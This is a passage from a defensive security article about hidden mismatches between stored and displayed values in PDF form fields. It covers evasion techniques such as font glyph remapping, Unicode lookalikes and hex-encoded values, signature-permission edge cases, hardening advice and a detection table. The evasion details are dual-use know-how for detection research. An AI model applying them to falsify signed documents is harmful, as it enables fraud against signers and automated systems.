  • XFA rendering divergence. XFA forms render through a separate engine (Adobe’s AXTE/XSLT pipeline) distinct from AcroForm rendering. V/AP analysis does not directly apply to XFA-native fields, which carry their own data/display separation in the XDP schema.
  • No broad corpus validation. See the “Validation Scope” subsection above. The empirical gap is acknowledged explicitly, not papered over.

Two evasion paths that were previously limitations are now detected: custom font encoding remaps are resolved via /Encoding /Differences table parsing before comparison; image-based AP streams are flagged structurally when a Do operator is present without text drawing operators (the actual image content cannot be compared without image recognition, but the structural anomaly is surfaced for manual review).

Adversarial Evasion Paths

An attacker who knows the detection logic can attempt to evade it. Being explicit about viable evasion paths is more useful than avoiding the topic:

Evasion techniqueHow it worksDetected?
Font encoding remap (E3) AP stream has (1200.00) Tj; custom /Font maps glyph 0x31 (“1”) to the visual glyph for “9” via /Encoding /Differences [49 /nine]. Viewer renders 9200.00. Naive text extraction reads 1200.00 — matches /V. No mismatch without glyph table resolution. Confirmed detected — E3_font_remap_evasion.pdf re-scanned after fix; [HIGH] Value/Appearance Mismatch fired. The scanner resolves /Encoding /Differences tables before comparison: byte 0x31 → glyph /nine → “9”, so rendered text 9200.00 is correctly compared against /V 1200.00. Deception 75 → high-risk.
Image-based AP (E4) AP stream draws a rasterised image via Do operator with an XObject. /V holds text. No text operators to extract. Structurally detected — E4_image_ap_structural.pdf scanned; [HIGH] “Image-Based Appearance Stream — V Not Visually Verifiable” fired. Deception 25 → suspicious. The actual image content cannot be compared to /V without image recognition, but the structural anomaly (Do present, no Tj/TJ) is deterministic and surfaced for manual review.
Unicode confusables (E2) AP renders аpproved (Cyrillic U+0430 “а”); /V is (approved) (Latin “a”). Bytes differ; visual appearance is identical. Confirmed detected — E2_unicode_confusable.pdf scanned; [HIGH] Value/Appearance Mismatch fired. Deception 25 → suspicious.
Hex-encoded /V (E1) /V <52656a6563746564> encodes “Rejected”. Naive string comparison reads angle-bracket hex, not decoded text; mismatch against AP rendering “Approved” is missed. Confirmed detected — E1_hex_v_evasion.pdf scanned; [HIGH] Value/Appearance Mismatch fired. Hex decode and UTF-16BE detection verified. Deception 25 → suspicious.
Whitespace normalisation tricks AP renders (Amount:   $1,200) with double-space; /V is (Amount: $1,200). After whitespace normalisation, strings match; mismatch is not flagged. No for genuine whitespace variance, which is common in legitimately authored forms. Flagging it would produce false positives on real documents.
Encrypted AP stream PDF is encrypted; AP decompression requires the document key. Without the password, AP content is inaccessible. No — acknowledged; checks apply only to unencrypted or decrypted content.

Font encoding remap and image-based AP were previously undetectable evasion paths; both are now addressed. Font encoding is resolved via glyph table lookup before comparison; image-based AP is flagged structurally so it reaches manual review. Encrypted AP and XFA rendering remain outside static analysis scope. All three remaining gaps require either the document key, a full rendering engine, or both — none are addressable with static byte-stream inspection alone.

An Open Question: DocMDP P=2 and Incremental Form Fill-ins

DocMDP P=2 permits form fill-ins and digital signatures but prohibits any other modification. The interaction between P=2 and incremental form fill-ins is an area that warrants careful consideration. The specific edge case: a viewer that fills a form field incrementally under P=2, updating /V in the incremental section, is permitted. A viewer that also regenerates the /AP stream in the same incremental section may or may not be considered a permitted modification depending on whether the validator treats AP regeneration as a document change.

The practical consequence: a certified P=2 document could have been legitimately filled, producing an incremental /AP update that some validators accept and others reject. A conservative implementation flags all incremental object additions under P=2 that contain form elements as potential violations. Whether a specific update is legitimate depends on whether it was generated by a compliant form-fill operation or by an attacker modifying fields outside the permitted scope. This is a known nuance, not a confirmed false positive, and the spec does not resolve it unambiguously.

Current scanner behaviour: All incremental updates that contain form elements (/Widget annotations or /AcroForm entries) under a P=2 DocMDP constraint are flagged as potential constraint violations. This is intentionally conservative — the flag surfaces the condition for manual review. Whether a specific incremental update represents a legitimate form fill-in or an out-of-scope modification requires context that static analysis alone cannot determine. Corpus data: 1 of 196 scanned files triggered a FieldMDP Bypass indicator — a US congressional bill (BILLS-116s3548is, US Senate 116th Congress) that carries incremental updates containing form elements after a FieldMDP certification signature; scored 601 (false positive). All 44 IRS forms and both VA agency forms produced zero MDP bypass indicators.

Safe Handling and Configuration

The technical findings above have practical consequences for anyone who receives, processes, or routes PDF forms. These are not theoretical edge cases — they apply to signed contracts, regulatory filings, and any workflow where a PDF form value is treated as authoritative.

For Individuals: Viewer Settings

  • Disable JavaScript in Acrobat: Edit → Preferences → JavaScript → uncheck “Enable Acrobat JavaScript.” Most form functionality works without it. JS is only required for complex field validation and multi-step wizards.
  • Use Protected Mode / Protected View: Acrobat Reader’s Protected Mode (Windows, enabled by default since Reader X) sandboxes the renderer in a low-privilege process. Confirm it is active under Edit → Preferences → Security (Enhanced). Disable “trust files in my Documents folder” if you receive external forms.
  • Open in a browser for untrusted files: Chrome and Firefox open PDFs in pdf.js or the built-in renderer without executing Acrobat JavaScript. This does not prevent V/AP divergence from affecting the display, but it eliminates the JavaScript execution surface entirely.
  • Verify fields independently: For any signed document where field values are legally or financially significant, confirm the visible value matches the form data by checking document properties or exporting form data as FDF/XFDF and comparing to what you see.

For Developers and Pipelines

  • Never trust /AP for authoritative field values. If you are processing form submissions from a PDF, read /V from the AcroForm dictionary — not text extracted from the appearance stream. Use a library that exposes the AcroForm object model (PyMuPDF, pdfminer, iText) rather than one that renders and OCRs.
  • Sanitize before storing: Strip /AP streams and rebuild them from /V when your pipeline is the authoritative writer. This eliminates divergence introduced by upstream tools. qpdf --generate-appearances regenerates appearance streams from field values.
  • Reject /NeedAppearances true in signed documents: If your pipeline accepts signed PDFs and treats them as authoritative, a file with /NeedAppearances true and a digital signature should be rejected or flagged for manual review — the signed content and the displayed content structurally cannot match.
  • Run forms through a static scanner before ingestion: If your system auto-processes form submissions (extract field values, trigger payment, update a record), scan the PDF before extraction. The field-value conditioning pattern — JavaScript that reads /V and posts it conditionally — is detectable statically and is rarely present in legitimately authored forms.

For Enterprise and IT

  • Group Policy (Windows): Adobe provides ADMX templates for Acrobat and Reader. Key settings include bEnableJS (disable JavaScript), bEnhancedSecurityInBrowser, and bEnhancedSecurityStandalone. These are available via the Adobe Enterprise Toolkit.
  • Email gateway configuration: Most email security gateways support PDF content inspection but vary in how deeply they inspect AcroForm structure. Where possible, configure your gateway to flag PDFs with JavaScript, OpenAction, and SubmitForm for manual review rather than auto-delivering them. /NeedAppearances true in combination with a signature is a narrower, more reliable signal.
  • Document verification workflows: For high-value signed documents (contracts, financial forms), consider a two-step verification: signature validation confirming the byte range is intact, followed by a structural audit confirming no V/AP divergence indicators. These are independent checks and both are necessary.
  • XFA: XFA forms are deprecated in PDF 2.0 and are not supported by many modern viewers, but Acrobat still renders them. If your environment has no business need to receive XFA forms, blocking them at the gateway eliminates a scripting attack surface that is distinct from AcroForm JavaScript and not always covered by the same scanner rules.

Detection Methodology Reference

The following table summarises the V/AP structural checks documented in this article. All operate on the raw PDF object model and do not require rendering. Severity escalates when indicators combine — the compound patterns in the weighted correlation analysis are documented in the “Correlation Engine Compound Patterns” table above.

Structural checkWhat it findsSeverity conditions
/NeedAppearances true AP streams are stale by construction — viewer regenerates from /V at open time Medium alone; Critical when a digital signature is also present
Checkbox/radio /V vs /AS key comparison Stored data value and displayed appearance state structurally disagree High; Critical when inside a signed byte range
AP stream text extraction (text fields) Tj/TJ operators reconstructed and compared to /V; literal and hex-string encoding handled High; Critical when signed
AP stream text extraction (listbox/combobox) Multi-select array extraction; /Opt export→display map resolved before comparison to prevent false positives on choice fields High; Critical when signed
Blank AP stream AP stream present but contains no text drawing operators — value in file, field renders blank Medium
Missing AP (/V set, no /AP) Display is viewer-defined via /DA — not statically present in the file Medium
Field-value seeding in JS behavioral analysis doc.getField() stub receives real /V values; conditional exploitation chains that gate on field content are correctly followed Applies to any JS indicator elevated by field-value conditioning
DocMDP P=1 + DSS-only incremental update Incremental section contains /DSS//VRI and no execution vectors, annotations, or form elements — permitted under ISO 32000-2 §12.8.2.2 Low (informational); Full bypass severity if DSS is mixed with execution vectors

PDF has accumulated three decades of features with no removal path, and the complexity around those features is the context for everything above. The checks above are designed to avoid false positives on legitimately authored documents; the /Opt export-value resolution and hex-string /V handling were added specifically to handle valid authoring patterns that naive string comparison would misread. Edge cases are possible; the structural indicators raise questions, not verdicts.

Run the scanner against a PDF →

Frequently Asked Questions

What is V/AP divergence in PDF AcroForm fields?

In a PDF AcroForm, every field stores its value in two independent locations: /V (the machine-readable data value read by JavaScript, form submission engines, and digital signature byte-range hashing) and /AP /N (the appearance stream the PDF viewer renders as pixels on screen). These stores are not derived from each other. V/AP divergence occurs when they disagree — the viewer displays one thing while the machine-readable value contains another. A digital signature can certify both while they structurally disagree.

Can a digitally signed PDF show different values to a human and to automated processing?

Yes. A digital signature certifies a byte range covering both /V and /AP. If an author sets /V to one amount and authors an /AP stream rendering a different figure, both are inside the certified byte range. The human signer sees what /AP renders; any JavaScript, form submission, or downstream automated system reads /V. The signature remains valid because the byte range is intact — it certifies content that structurally disagrees within itself.

What does /NeedAppearances true mean for a digitally signed PDF?

When /NeedAppearances true is present in the AcroForm dictionary (ISO 32000 §12.7.2), the viewer regenerates appearance streams from /V field values at document open time — the /AP streams stored on disk are stale by construction. Combined with a digital signature, the byte-range hash covers the stale /AP, but the viewer regenerates the appearance from /V after opening. The provenance of what is displayed and what was certified is always structurally different.

How can V/AP divergence be detected without rendering the PDF?

Five static checks operate directly on the raw PDF object model: (1) /NeedAppearances detection via regex against the AcroForm dictionary; (2) Checkbox and radio /V vs /AS key comparison — a pure string comparison of two name objects; (3) AP stream text extraction — decompress the /AP /N content stream, parse Tj/TJ operators, PDF-unescape and whitespace-normalise, compare to /V with hex-string decoding and /Opt export-value resolution; (4) Blank AP stream detection; (5) Missing AP detection. None require opening the file in a viewer.

What is DocMDP P=1 and why does the DSS/LTV exemption matter?

DocMDP P=1 is a certifying signature permission level that prohibits all modifications to a PDF after signing. ISO 32000-2 §12.8.2.2 NOTE 2 explicitly exempts DSS (Document Security Store) and LTV (Long Term Validation) additions — these carry OCSP responses, CRLs, and certificate chains needed to validate the signature long after the signing certificate’s OCSP responder may be offline. A scanner that flags all incremental updates under P=1 as bypass attempts will produce false positives on every legitimately LTV-enabled document.

What is the difference between a PDF form field’s /V value and its /AP /N appearance stream?

/V is the field’s machine-readable value — read by JavaScript (doc.getField().value), included in form submissions, and covered by the digital signature byte-range hash. /AP /N is a self-contained PDF content stream the viewer renders as pixels — it is what the user sees on screen. The two are authored independently, are not derived from each other, and only the viewer reads /AP. Everything else — JavaScript, submission engines, signature validators — reads /V.

How does JavaScript field-value conditioning work as a PDF attack technique?

A malicious PDF can contain OpenAction JavaScript that reads a form field value and conditionally launches a URL or posts data only when that value matches a specific string such as ‘approved’. If a behavioral sandbox returns empty strings for all getField() calls — the natural default when field enumeration and JS emulation run as independent passes — the conditional is never satisfied and the sandbox reports clean. Correct detection requires seeding the JS emulator with real /V values extracted from the AcroForm field dictionaries before execution.

Which PDF authoring tools produce legitimate /NeedAppearances true documents?

Programmatic form-fill workflows that update /V but defer /AP regeneration legitimately produce /NeedAppearances true documents — including mail-merge pipelines, PDF form-fill libraries, and e-signature platforms (DocuSign-generated PDFs have been observed to carry /NeedAppearances true; observed behavior, not vendor-documented) that prioritise speed over appearance-stream completeness. On its own, /NeedAppearances true is a medium-severity finding. The critical signal is /NeedAppearances true combined with a digital signature, which is rarely produced by legitimate tooling. Running qpdf --generate-appearances before signing eliminates the condition by rebuilding all AP streams from current /V values.

Research References

  1. C. Mainka, V. Mladenov, S. Rohlmann, J. Schwenk. “Shadow Attacks: Hiding and Replacing Content in Signed PDFs.” Proceedings of the Network and Distributed System Security Symposium (NDSS) 2021 and extended presentation at ACM CCS 2021. Disclosed to 28 vendors; resulted in patches from Adobe, Foxit, LibreOffice, and others.
    ndss-symposium.org
  2. J. Müller, V. Mladenov, J. Somorovsky, J. Schwenk. “PDF Insecurity” series (2017–2019). Systematic study of signature-validation weaknesses across viewers and libraries. Introduced the Universal Signature Forgery and incremental-save attack classifications.
    pdf-insecurity.org
  3. ISO 32000-2:2020. Document management — Portable Document Format — Part 2: PDF 2.0. International Organization for Standardization, Geneva, Switzerland. §12.8.2.2 (DocMDP), §12.7.3 (AcroForm), §12.7.4 (Field types and /V semantics), §12.7.8 (XFA forms — deprecated in PDF 2.0).
  4. ETSI EN 319 132-1 V1.2.1 (2019). Electronic Signatures and Infrastructures (ESI) — XAdES digital signatures — Part 1: Building blocks and XAdES baseline signatures. European Telecommunications Standards Institute. The PAdES equivalent, ETSI EN 319 102-1, defines the DSS/LTV addition workflow that ISO 32000-2 §12.8.2.2 NOTE 2 permits under DocMDP P=1.
    ETSI EN 319 102-1 (PDF)
  5. MITRE ATT&CK T1566.001 — Phishing: Spearphishing Attachment. Documents the operational use of malicious file attachments, including PDF-delivered payloads, as an initial-access technique. Relevant to the threat-spectrum context in this article: the majority of malicious PDFs observed in the wild are spearphishing attachments that do not rely on AcroForm field manipulation.
    attack.mitre.org/techniques/T1566/001
  6. UK National Cyber Security Centre. “Pattern: Safe Import.” NCSC Guidance. Describes the content-disarm-and-reconstruct (CDR) approach to untrusted document import: strip active content, rebuild the file from validated structure. The multi-layer sanitization philosophy in this article (strip, flatten, rasterise as ordered trust levels) maps directly to this pattern.
    ncsc.gov.uk/guidance/pattern-safe-import
  7. D. Stevens. PDF malware analysis tools and research. Didier Stevens has published practical PDF malware analysis resources including pdfid.py and pdf-parser.py — widely used to enumerate PDF objects, detect JavaScript, identify OpenAction and embedded file streams, and triage suspicious PDFs without rendering.
    blog.didierstevens.com/programs/pdf-tools
  8. CVE-2021-28550. Adobe Acrobat and Reader use-after-free (APSB21-29, May 2021). Exploitable via malformed AcroForm structure; remote code execution. CVSS 8.8.
  9. CVE-2021-21017. Adobe Acrobat heap-based buffer overflow in XFA engine (APSB21-09, February 2021). Remote code execution. CVSS 8.8.
  10. CVE-2024-45112. Adobe Acrobat XFA/AcroForm type confusion (APSB24-70, September 2024). Remote code execution; exploitable via a PDF containing both XFA and AcroForm structures. CVSS 8.6.
  11. CVE-2023-21608. Adobe Acrobat use-after-free (APSB23-01, January 2023). Remote code execution via crafted PDF. CVSS 7.8.

PQ PDF PQ PDF Tools

© 2026 PQ PDF — All rights reserved.

← All PDF Tools • About • Legal • Privacy • Security • Contact

Secure document utilities — free, private, zero-retention. pqpdf.com